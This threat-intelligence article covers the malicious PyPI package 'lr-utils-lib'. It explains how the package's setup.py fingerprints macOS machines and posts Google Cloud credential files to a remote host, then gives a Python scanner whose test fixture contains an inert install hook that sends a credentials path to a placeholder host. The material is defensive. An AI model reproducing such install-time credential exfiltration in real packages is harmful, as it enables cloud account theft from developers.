Malicious Python Package Mac – Malware

January 30, 2025

Malicious Python Package Mac

Type of Malware: Infostealer
Date of initial activity: 2024
Motivation: Data Theft
Attack Vectors: Phishing
Type of Information Stolen: Login Credentials
Targeted Systems: macOS

Overview

Cybersecurity researchers recently uncovered a malicious Python package named “lr-utils-lib” that was uploaded to the Python Package Index (PyPI) and specifically targeted macOS developers. The package contained hidden code designed to execute automatically upon installation, posing a significant threat to unsuspecting users. As the software development community increasingly relies on third-party libraries to streamline workflows, malicious code inside popular repositories has serious implications for supply chain security. Once active, “lr-utils-lib” harvests Google Cloud Platform (GCP) credentials by extracting authentication files from the user’s system. The malware operates stealthily: it first verifies the operating system, then retrieves a unique identifier for the device. Once it confirms its target, it reads sensitive configuration files from the Google Cloud SDK directory, enabling attackers to gain unauthorized access to cloud resources.

Targets: Individuals

How they operate

The malicious behavior of “lr-utils-lib” is triggered automatically upon installation because the code is placed in the package’s setup.py. This file is a standard part of a Python package and is executed when a user installs it. The malware first verifies that the installation is occurring on a macOS system, its primary target. It then retrieves the IOPlatformUUID, a unique identifier for the device, and hashes it with SHA-256. The resulting hash is compared against a predefined list of 64 hashed UUIDs stored within the malicious code. This targeted approach indicates that the attackers likely had prior knowledge of their intended victims and were singling out specific macOS machines.

If a match is found, the malware begins exfiltration, focusing on two files in the user’s ~/.config/gcloud directory: application_default_credentials.json and credentials.db. These files typically contain Google Cloud authentication data, making them prime targets for attackers seeking unauthorized access to cloud resources. The harvested credentials are then transmitted to a remote server through HTTPS POST requests, with the contents of both files sent to europe-west2-workload-422915[.]cloudfunctions[.]net. By using HTTPS, the attackers make the exfiltration blend in with ordinary encrypted traffic, which makes the malicious behavior harder for victims to detect.

The technical sophistication of the “lr-utils-lib” package highlights the need for developers to maintain a rigorous security posture when integrating third-party packages into their projects. This incident is a reminder that the software supply chain is a potential attack vector, and that attackers increasingly employ targeted strategies to compromise systems. Developers must remain vigilant, thoroughly auditing the packages they use and ensuring they come from trusted sources.

The package also demonstrates how social engineering can augment technical exploits. In this case, a fake LinkedIn profile associated with the package’s creator illustrates the potential for manipulation and deception. As the digital landscape evolves, attackers keep finding new ways to lend credibility to their malicious activity, so developers must remain critical and discerning when verifying information. Ultimately, the “lr-utils-lib” operation is a wake-up call for the software development community. As supply chain attacks become more sophisticated and prevalent, developers and organizations must prioritize robust security practices, including regular package audits and stringent vetting processes. By fostering a culture of security awareness and critical thinking, the development community can better defend against the ever-evolving threats within the software ecosystem.
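The behaviours described above (an install-time hook in setup.py, macOS UUID fingerprinting hashed with SHA-256, reads of the ~/.config/gcloud credential files, and an HTTPS POST to a cloudfunctions.net host) are exactly the strings a reviewer can look for before letting pip execute a package. The following scanner is an added example written for this article, not code from the original post or from the malicious package; it reads setup.py out of an sdist and reports which of those indicators appear. The indicator weights, the review threshold, the sample setup.py fixture (inert, constructed for the test) and the PLACEHOLDER host name in it are assumptions of the example, not values from the article.

```python
"""Heuristic pre-install review of a Python sdist's setup.py.

Added example, not code from the original article or from the malicious
package it describes. It flags the behaviours the article attributes to
lr-utils-lib so a package can be reviewed before pip runs its setup.py.
"""
import io
import re
import tarfile
from typing import Dict, List

# (indicator name, regex, weight). Weights are an assumption of this example,
# chosen so that credential-file access alone already warrants a manual look.
INDICATORS = [
    ("install_hook",
     r"cmdclass\s*=|class\s+\w+\(\s*(?:install|develop|egg_info)\s*\)", 3),
    ("platform_check", r"platform\.system\(\)|sys\.platform", 1),
    ("macos_uuid", r"IOPlatformUUID", 3),
    ("hashing", r"hashlib\.sha256", 1),
    ("gcloud_creds",
     r"\.config/gcloud|application_default_credentials\.json|credentials\.db", 4),
    ("exfil_endpoint",
     r"cloudfunctions\.net|requests\.post\(|urllib\.request\.urlopen\(", 2),
]
RISK_THRESHOLD = 6  # assumed cut-off for "needs manual review"


def scan_setup_py(source: str) -> Dict[str, List[int]]:
    """Return {indicator: [1-based line numbers]} for every indicator that matched."""
    compiled = [(name, re.compile(pat)) for name, pat, _ in INDICATORS]
    findings: Dict[str, List[int]] = {}
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, regex in compiled:
            if regex.search(line):
                findings.setdefault(name, []).append(lineno)
    return findings


def risk_score(findings: Dict[str, List[int]]) -> int:
    """Sum the weight of each distinct indicator that fired (once per indicator)."""
    weights = {name: weight for name, _, weight in INDICATORS}
    return sum(weights[name] for name in findings)


def is_suspicious(findings: Dict[str, List[int]]) -> bool:
    return risk_score(findings) >= RISK_THRESHOLD


def scan_sdist_bytes(data: bytes) -> Dict[str, List[int]]:
    """Locate setup.py in a .tar.gz sdist (top level or one directory down) and scan it."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar.getmembers():
            parts = member.name.split("/")
            if member.isfile() and parts[-1] == "setup.py" and len(parts) <= 2:
                fh = tar.extractfile(member)
                return scan_setup_py(fh.read().decode("utf-8", errors="replace"))
    return {}


# Constructed, inert fixture: it only contains the strings a reviewer would look for.
# The host name is a placeholder, not the indicator named in the article.
SAMPLE_SETUP_PY = '''\
# Constructed sample for the scanner; it performs none of these actions.
from setuptools import setup
from setuptools.command.install import install
import hashlib, platform, requests

class CustomInstall(install):
    def run(self):
        if platform.system() == "Darwin":
            fingerprint = hashlib.sha256(b"IOPlatformUUID placeholder").hexdigest()
            target = "~/.config/gcloud/application_default_credentials.json"
            requests.post("https://PLACEHOLDER.cloudfunctions.net/", data=target)
        install.run(self)

setup(name="demo-pkg", version="0.0.1", cmdclass={"install": CustomInstall})
'''

# Constructed benign fixture: a plain declarative setup.py.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="ok-pkg", version="1.0")\n'


def build_sample_sdist() -> bytes:
    """Pack SAMPLE_SETUP_PY into an in-memory .tar.gz laid out like a real sdist."""
    buf = io.BytesIO()
    payload = SAMPLE_SETUP_PY.encode("utf-8")
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(name="demo-pkg-0.0.1/setup.py")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


if __name__ == "__main__":
    hits = scan_sdist_bytes(build_sample_sdist())
    for name, lines in hits.items():
        print(f"{name:15s} lines {lines}")
    print("score", risk_score(hits), "suspicious" if is_suspicious(hits) else "ok")
```

To use it against a real download, fetch the sdist with `pip download --no-binary :all: --no-deps <package>` and pass the file's bytes to `scan_sdist_bytes` before installing. The weights are deliberately asymmetric: a platform check or a hash call is common in honest packages, whereas any reference to the gcloud credential store from install-time code has no legitimate reason to be there and should block installation until a human has read the file.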
References:
  • Malicious Python Package Targets macOS Developers To Access Their GCP Accounts
Tags: Infostealers, Mac, MacOS, Malicious Python Package Mac, Malware, Phishing, PyPI, Python
    © 2025 | CyberMaterial | All rights reserved